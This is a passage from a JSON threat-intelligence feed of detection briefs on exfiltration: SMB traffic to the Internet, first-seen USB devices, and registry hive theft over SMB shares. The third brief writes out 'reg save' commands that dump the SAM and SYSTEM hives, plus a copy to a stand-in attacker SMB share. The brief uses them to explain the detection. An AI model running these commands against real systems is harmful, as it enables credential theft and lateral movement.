addresses triggering the rule, identifying internal systems initiating SMB traffic and determining if they belong to known devices or users within the organization, as described in the provided investigation guide.\u003c/li\u003e\n\u003cli\u003eRegularly audit network configurations and update the rule exceptions to include any legitimate device IPs to prevent false positives, as mentioned in the investigation guide.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T14:12:00Z","date_published":"2024-01-02T14:12:00Z","id":"/briefs/2024-01-smb-to-internet/","summary":"This rule detects network events indicating the use of Windows file sharing (SMB or CIFS) traffic to the Internet, which is commonly exploited for initial access, backdoor deployment, or data exfiltration.","title":"SMB (Windows File Sharing) Activity to the Internet","url":"https://feed.craftedsignal.io/briefs/2024-01-smb-to-internet/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend","Microsoft Defender XDR","SentinelOne Cloud Funnel"],"_cs_severities":["low"],"_cs_tags":["initial-access","exfiltration","windows","registry","usb"],"_cs_type":"advisory","_cs_vendors":["Microsoft","SentinelOne","Elastic"],"content_html":"\u003cp\u003eThis detection identifies the first-time appearance of removable devices on a Windows system by monitoring registry modifications. While not inherently malicious, the activity can indicate potential data exfiltration over removable media or initial access attempts using malware delivered via USB. The rule specifically looks for registry events with the \u0026ldquo;FriendlyName\u0026rdquo; value associated with USB storage devices (\u0026ldquo;USBSTOR\u0026rdquo;). This helps in identifying potentially unauthorized devices connected to the system. The detection is designed to work with data from Elastic Defend, Microsoft Defender XDR, SentinelOne Cloud Funnel, and Sysmon.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eA user connects a removable device (e.g., USB drive) to a Windows system.\u003c/li\u003e\n\u003cli\u003eThe operating system detects the new device and attempts to enumerate its properties.\u003c/li\u003e\n\u003cli\u003eThe system queries the registry for device-specific settings, including the \u0026ldquo;FriendlyName,\u0026rdquo; under the \u003ccode\u003eHKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Enum\\USBSTOR\u003c/code\u003e key.\u003c/li\u003e\n\u003cli\u003eIf the device is new to the system, the registry is modified to record the device\u0026rsquo;s information, including its friendly name.\u003c/li\u003e\n\u003cli\u003eThe event generates a registry modification event, which is logged by Sysmon, Elastic Defend, Microsoft Defender XDR, or SentinelOne.\u003c/li\u003e\n\u003cli\u003eAn attacker may use the USB device to deploy malware or exfiltrate sensitive data.\u003c/li\u003e\n\u003cli\u003eThe attacker copies files to the USB device.\u003c/li\u003e\n\u003cli\u003eThe attacker removes the USB device, completing the exfiltration.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation and data exfiltration via USB can lead to the loss of sensitive information, intellectual property theft, or the introduction of malware into the network. Although this alert is low severity, multiple alerts across the environment may indicate an active campaign. The detection focuses on registry modifications, which are early indicators of device connection, allowing for proactive monitoring and response.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eEnable Sysmon registry event logging to detect registry modifications related to USB devices and activate the Sigma rules below.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rules provided to your SIEM to detect and monitor first-time seen USB devices.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by the Sigma rules, correlating with user activity and file access events.\u003c/li\u003e\n\u003cli\u003eMaintain a list of approved USB devices and create exceptions for them in the monitoring system to reduce false positives as described in the rule documentation.\u003c/li\u003e\n\u003cli\u003eMonitor for subsequent file access or transfer events involving the new device as described in the rule documentation.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T14:00:00Z","date_published":"2024-01-02T14:00:00Z","id":"/briefs/2024-01-first-time-usb/","summary":"Detection of newly seen removable devices via Windows registry modification events can indicate data exfiltration attempts or initial access via malicious USB drives.","title":"First Time Seen Removable Device Registry Modification","url":"https://feed.craftedsignal.io/briefs/2024-01-first-time-usb/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Elastic Defend"],"_cs_severities":["medium"],"_cs_tags":["credential-access","lateral-movement","exfiltration","windows"],"_cs_type":"advisory","_cs_vendors":["Elastic"],"content_html":"\u003cp\u003eThis threat brief addresses the potential exfiltration of Windows registry hives via SMB shares, a tactic often employed after credential dumping. Attackers target sensitive hives like the Security Account Manager (SAM) to extract cached credentials. By copying these hives to an attacker-controlled system, they evade local host-based detection and facilitate offline credential decryption. The Elastic detection rule \u003ccode\u003ea4c7473a-5cb4-4bc1-9d06-e4a75adbc494\u003c/code\u003e identifies the creation or modification of registry hive files (identified by the \u0026ldquo;regf\u0026rdquo; header) exceeding 30KB on SMB shares, specifically when performed by the SYSTEM process (PID 4) under a user context associated with system accounts (S-1-5-21 or S-1-12-1). This behavior raises suspicion, particularly when observed outside expected file paths. Defenders should monitor for this activity as it often precedes lateral movement and further compromise.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker gains initial access to a Windows system.\u003c/li\u003e\n\u003cli\u003eThe attacker elevates privileges to SYSTEM or a similar high-privilege account.\u003c/li\u003e\n\u003cli\u003eThe attacker executes a credential dumping tool (e.g., \u003ccode\u003ereg save HKLM\\SAM sam.hive\u003c/code\u003e) to extract the SAM registry hive.\u003c/li\u003e\n\u003cli\u003eThe attacker executes \u003ccode\u003ereg save HKLM\\SYSTEM system.hive\u003c/code\u003e to extract the SYSTEM registry hive, enabling decryption of SAM secrets.\u003c/li\u003e\n\u003cli\u003eThe attacker connects to a remote SMB share (e.g., \u003ccode\u003e\\\\attacker.example.com\\share\u003c/code\u003e) from the compromised host.\u003c/li\u003e\n\u003cli\u003eThe SYSTEM process (PID 4) creates or modifies a file on the SMB share, identified as a registry hive by its header (\u0026ldquo;regf\u0026rdquo;).\u003c/li\u003e\n\u003cli\u003eThe exfiltrated registry hive file is larger than 30KB, bypassing size-based filtering.\u003c/li\u003e\n\u003cli\u003eThe attacker utilizes the exfiltrated SAM and SYSTEM hives to extract user credentials offline, facilitating lateral movement or further malicious activities.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exfiltration of registry hives can lead to widespread credential compromise, enabling attackers to move laterally within the network, access sensitive data, and potentially achieve domain dominance. The impact includes unauthorized access to critical systems, data breaches, and significant disruption of business operations. The number of affected systems directly correlates with the scope of credential access achieved by the attacker.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Elastic detection rule \u003ccode\u003ea4c7473a-5cb4-4bc1-9d06-e4a75adbc494\u003c/code\u003e or the Sigma rules provided in this brief to your SIEM and tune for your environment to detect registry hive exfiltration attempts.\u003c/li\u003e\n\u003cli\u003eEnable file creation and modification logging on SMB shares, specifically focusing on events associated with the SYSTEM process and registry hive file signatures, to increase visibility.\u003c/li\u003e\n\u003cli\u003eReview and harden SMB share permissions to restrict unauthorized access and prevent credential dumping from remote systems.\u003c/li\u003e\n\u003cli\u003eInvestigate any alerts generated by these rules promptly, focusing on identifying the source host, the user account involved, and the destination SMB share.\u003c/li\u003e\n\u003cli\u003eImplement multi-factor authentication (MFA) for all user accounts to mitigate the impact of credential theft.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T12:00:00Z","date_published":"2024-01-02T12:00:00Z","id":"/briefs/2024-01-smb-registry-exfiltration/","summary":"Detection of medium-sized registry hive files being created or modified on Server Message Block (SMB) shares, potentially indicating exfiltration of Security Account Manager (SAM) data for credential extraction.","title":"SMB Registry Hive Exfiltration","url":"https://feed.craftedsignal.io/briefs/2024-01-smb-registry-exfiltration/"}],"language":"en","title":"CraftedSignal Threat Feed — Exfiltration","version":"https://jsonfeed.org/version/1.1"}